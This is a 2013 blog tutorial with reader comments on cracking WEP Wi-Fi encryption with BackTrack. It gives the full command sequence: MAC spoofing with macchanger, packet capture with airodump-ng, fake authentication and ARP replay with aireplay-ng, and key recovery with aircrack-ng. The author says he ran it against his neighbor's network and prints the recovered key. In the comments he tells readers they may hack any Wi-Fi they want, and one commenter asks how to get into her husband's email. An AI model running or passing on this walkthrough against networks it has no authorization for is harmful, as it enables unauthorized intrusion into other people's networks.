Tuesday, January 1, 2013

Cracking WEP with BackTrack

I admit, one of my favorite things to do in backtrack is to crack a good ole WIFI. It can lead to so many different options and really brings me back to my roots as to why i stumbled upon backtrack in the first place. I guess it's just thrilling, it gives me  sort of a high to be in places i shouldn't. To be able to completely exploit an entire network as a local user is definitely something that's fun an exciting. I do want to stress the fact that even though we've all maybe done it once or twice, Black Hat hacking is entirely unethical and not condoned here. I may sound hypocritical, but i do not do anything malicious to the machines i exploit. I have permission to do so. This is an Ethical Hackers website for information and security purposes only.
I'm Far from a pro-hacker. I'm Maybe intermediate at best. if anything looks out of the ordinary feel free to email me with any questions or tips. I don't claim to be the best; i'm still learning. However, what i have learned thus far i'm willing to share so here goes:

 Today I'm going to demonstrate how insecure the WEP encryption is through wifi. In Today's world you have a lot of people that like to set it and forget it. I'm sure most readers have heard of Verizon, a poineer in telecom. Well in my area Verizon offers high speed internet DSL and FIOS. Great service most of the time. The problem is their Westell DSL modems/WIFI routers come preset to use the WEP encryption. I really wish they would catch on to this. My neighbor has DSL through Verizon. Westell Modem, WEP WIFI!
lets see what we can do!
We will be using the AIR tools, fun fun.

 Fire up a shell and run commands as following

 1. airmon-ng

  wlan1 is my interface. these can be variable so yours may be different

next, with the information airmon has given you (wlan1) for an interface you want to run these 4 commands.

1. airmon-ng stop wlan1     (Stops the wlan1 interface)
2. ifconfig wlan1 down        (wlan1 no longer in use)
3. macchanger --mac 00:11:22:33:44:55 wlan1 (spoofs the mac address)
4. airmon-ng start wlan1      (restarts the interface with new mac)
Below is what it looked like for me.

In Some situations your Network adapter may not be supported. i will compile a list of supported network adapters in the future. or you can google it.
I have this one:


 


 
However if it did work then you have successfully faked the mac and it's time to keep on moving.
Next thing; and this is obviously important, is to pick a network. do this by running this command

1. airodump-ng wlan1 (MAKE SURE YOUR USING YOUR INTERFACE)

after you run the command, wait a few minutes to get an accurate read on what's out there for wireless networks. hit CTRL+C to cancel the running application and choose a good network that is WEP
i have the network i want to crack in my crosshairs. It's highlighted below:
The next thing we must do is configure airodump-ng to watch that specific network and capture the unique data holding the password and put it into a file (hackedwifi) or whatever you decide to name it.
the command is as follows:

1. airodump-ng -c (channel) -w (filename) --bssid (bssid) (interface)

for me it looks like this:
airodump-ng -c 6 -w hackedwifi --bssid 00:12:0E:55:29:13 wlan1


This is what your output should look like:

  
Keep in mind rather than opening several terminals i like to tab them using CTRL+SHIFT+T
While you have airodump running,  in a seperate terminal run this command

1. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

for me the command looks like this

aireplay-ng -1 0 -a 00:12:0E:55:29:13 -h 00:11:22:33:44:55 -e 06B409983674 wlan1

In most cases, and in what you want to happen is output saying "association successful" with a smiley face. This is good and if you get this output you are on the right track. If not email me and i will feel free to help you out
.


 Now that you are associated with the Access point we need to use aireplay-ng to create an abundance of data on the network so we can sniff out the encrypted PW. Run this command:

1. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

for me it looks like this:
aireplay-ng -3 -b 00:12:0E:55:29:13 -h 00:11:22:33:44:55 wlan1

 

Now it's time to wait. You will notice Airodump going crazy collecting data. Personally, sometimes i leave the room or go do something else for about 20 minutes. What you want is to collect enough Data for the cracker. watch the #Data column. i like to wait until it's between 10,000 and 20,000 before i run the cracker.

Ok, it's been about a half hr and it's time to run the cracker. run this command.

1. aircrack-ng -b (bssid) (filename-01.cap)

if you forgot yourfile just type "dir" and it will be a .cap file.
mine looks like this
aircrack-ng -b 00:12:0E:55:29:13 hackedwifi-01.cap
If you did not sniff enough data it will look like this:
  And IF you did it will look like this:

 The Key to the wireless network is: 6HSKV
to prove it worked i took a screenshot in win7




Happy Hacking!

questions email me: davidjgeraway@gmail.com


 






  w
Posted by at

24 comments:

  1. YorgosApril 25, 2013 at 7:59 AM

    although these steps are the most common way to crack a wep network I give you 2 thumbs up for the detailed explanation.
    Great Job!

    ReplyDelete
    Replies
    1. UnknownSeptember 16, 2013 at 8:36 PM

      Yorgos'
      Thanks for the thumbs up, feel free to drop a link and if you want to write an article for this site i will give you full credit for doing so :-)

      Delete
  2. wasabiTienMay 8, 2013 at 5:19 PM

    hey, i am unable to get the smiley face for this comment.
    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

    what could b d problem?

    ReplyDelete
    Replies
    1. UnknownSeptember 16, 2013 at 8:29 PM

      Sometimes mac filtering is enabled on the Access point. this will disallow you from being associated with the AP. there are other ways of cracking WEP, which i will continue to write an article on in the near future.

      Delete
  3. UnknownMay 27, 2013 at 9:14 PM

    how to open new terminal..?

    ReplyDelete
  4. rosa sanchezJune 2, 2013 at 1:57 AM

    How can i backtrack a yahoo account n have acces to my husbands emails

    ReplyDelete
  5. UnknownJune 3, 2013 at 8:18 AM

    Hi I can't figure out how to get my USB wireless card to be recognized as my interface. I have windows 7 and I installed VMware 9 on default location in c: drive and then I installed the backtrack 5r3 gnome 64 iso and plugged in my alfa awus036nh USB. When I got to see what my interface is with ifconfig or airmon-ng there's nothing listed at all! Can someone help me with configuring this? My email is njleetage@yahoo.com and I am willing to pay someone via PayPal to get my interface working with my alfa card so I will be able to use airmon-ng start wlan

    ReplyDelete
    Replies
    1. UnknownAugust 21, 2013 at 10:38 AM

      Did you add the USB device to your backtrack machine in VMWare?

      Delete
    2. UnknownSeptember 16, 2013 at 8:32 PM

      Make sure you are looking in the correct places. if it's already active on windows then VMware should relay the device to the linux operating system. try running JUST kismet and see if it automatically detects the device. there is also a few options under the system management utility to find new hardware under the backtrack menus.

      Delete
  6. UnknownAugust 21, 2013 at 10:40 AM

    Hmm... airmon-ng creates a new interface, mon0, for monitoring mode. Don't you need to use that interface for airodump-ng?

    ReplyDelete
    Replies
    1. UnknownSeptember 16, 2013 at 8:34 PM

      typically, you use mon0 separately from the primary or secondary wifi interface. This gives you the ability to still have functionality with your wlan device and crack at the same time. however, i prefer my machine to be offline when cracking any Wifi's. Only time im connected to an AP in backtrack is to either:
      A. write tutorials.
      B. Hack things other than wifi.

      Delete
  7. UnknownSeptember 19, 2013 at 10:13 PM

    sir we can hack other wifi signal or only own wifi signal pls help me??????????
    thakursanjeev2551@gmail.com

    ReplyDelete
  8. UnknownSeptember 19, 2013 at 10:16 PM

    If i want to hack other wifi signal then how many hours take this process?????

    ReplyDelete
    Replies
    1. UnknownSeptember 19, 2013 at 11:12 PM

      To both of your consecutive comments:
      1, you may attempt to hack any wifi you want. Please remember it is illegal to to anything arbitrary to an AP you don't own. I'm not saying everyone follows the rules :-)
      2. Hours? Depending on the encryption and amount of network traffic. I've done it in as little as 10 minutes (could actually be a little less) and I've had to work real hard with others. This tutorial is for basic WEP cracking mainly for beginners. Nobody has asked about WPA yet so I haven't written a tut for that

      Delete
  9. UnknownSeptember 29, 2013 at 6:34 PM

    Hi! I'm stuck on the last part where I do everything fine and then when I run aircrack it says "no matching network found - check your bssid". Can you please help me out?

    ReplyDelete
  10. UnknownNovember 16, 2013 at 12:19 PM

    11:39:44 Association successful :-) (AID: 1)
    aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55
    Captured 373158 packets (got 13575 ARP requests and 32210 ACKs), sent 65077 packets...(500 pps)
    Notice: got a deauth/disassoc packet. Is the source MAC associated ?
    Failed. Next try with 20000 IVs
    any comments will help

    ReplyDelete
  11. UnknownNovember 19, 2013 at 4:57 PM

    Sir Good day.

    Is their any Best or New way to crack a Wep?. I followed your step but it always says "Failed. Next try with blah blah". I've collected enough and sometimes more than enough like 100k #Data but still, always failed...any idea whats wrong?.

    ReplyDelete
  12. rishiNovember 20, 2013 at 7:28 AM

    hi david,
    I was using your method of cracking the wep possword. but i got this problem in which there was (0 ppm) all the time unlike your screen shot i am awating your help in this matter. here is part in trouble,
    aireplay-ng -3 -b 94:D7:23:EC:80:C1 -h 00:11:22:33:44:55 wlan0
    and u will b receiving a similar e-mail with screenshot for ur reference to ur mail id.

    HELP ME!!!!!!

    and by the way your explanation was GREAT
    THANKS!!!!!!

    ReplyDelete
  13. GippoJanuary 6, 2014 at 1:49 AM

    Hi Dave, many compliments for the great guide. but i have a problem.
    I did everything till the association that is "successful", but when i launch the
    aireplay-ng -3 -b 94:D7:23:EC:80:C1 -h 00:11:22:33:44:55 wlan0
    i get only the read packet running, 0 ARP, 0 ACKS, 0 sent, 0 PPS.

    What could be?
    Thanks in advance
    F

    ReplyDelete
  14. DiangoJanuary 25, 2014 at 9:45 AM

    Hey everyone i want to thank you it worked for me.but i used a push from another site too i combinated these with another guide I found in the Internet.the reason why is failing to you guys is because everytime you do the last step you are using a new cap file. You need to re-using the same cap here is the link.. http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

    ReplyDelete
  15. UnknownFebruary 20, 2014 at 10:59 PM

    i have no response with airmon-ng command,interface are not not working

    ReplyDelete
  16. UnknownApril 10, 2014 at 10:42 AM

    when i entered command "airodump-ng wlan0" I got a message saying "ioctl (SIOCSIWMODE) failed: Device or resource busy.

    ReplyDelete
  17. AnonymousNovember 28, 2016 at 6:18 PM

    how new file create?

    ReplyDelete

Subscribe to: Post Comments (Atom)